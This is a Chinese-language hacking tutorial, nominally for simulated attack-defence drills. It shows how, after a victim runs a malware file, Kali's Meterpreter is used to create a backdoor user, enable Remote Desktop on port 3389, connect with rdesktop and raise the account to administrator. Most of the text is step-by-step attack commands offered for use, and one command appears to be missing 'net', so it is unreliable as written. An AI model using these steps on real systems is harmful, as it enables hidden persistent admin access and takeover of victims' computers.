黑客如何远程控制计算机并新建用户启用远程桌面

一、背景介绍

在我们日常使用Kali Linux时，我们通常在进行模拟攻防演练的时候，我们如何拿下目标主机最高权限呢（例如利用病毒拿下Win7主机），怎样在受害者主机进行随意操作呢？如何进行文件下载以及文件上传呢？如何解决上述问题呢？接下来让我们一起学习！

二、资源装备

1.安装好Kali Linux的虚拟机一台；

2.已经被控制的Windows主机一个；

3.整装待发的小白一个。

三、渗透攻防

3.1查看kali虚拟机sessions状况，如下图所示。

命令：sessions

3.2 在受害者主机执行病毒文件，如下图所示。

步骤：双击如下图所示的文件

3.3 再次在Kali Linux中执行sessions命令，如下图所示。

命令：sessions

3.4 执行命令，给受害者主机创建用户，如下图所示。

命令：sessions -i 5

run getgui -u 用户名 -p 密码

Eg： run getgui -u hacker -p 123456

3.5 执行getgui脚本文件，开启受害者主机3389端口（远程桌面连接端口），如下图所示。

命令：run getgui -e

3.5.1 执行结果如下图所示。

3.6 查看受害者主机的ip地址，如下图所示。

命令：ipconfig

3.7 连接受害者主机的远程桌面，如下图所示。

命令：rdesktop 192.168.0.107:3389

3.7.1 登录窗口如下图所示，根据创建的用户进行登录

3.8 遇到创建的用户不是管理员组用户的问题，如下图所示

3.9 解决升级管理员权限的问题

3.9.1 启动dos窗口

命令：shell

3.9.2 升级管理员用户，如下图所示。

命令：localgroup administrators 用户名 /add

Eg ：localgroup administrators hacker /add

3.9.3 解决乱码问题，如下图所示。

命令：chcp 65001

3.10 继续登录，如下图所示。

3.10.1 登录界面

3.10.2 选择是

3.11 渗透成功，如下图所示。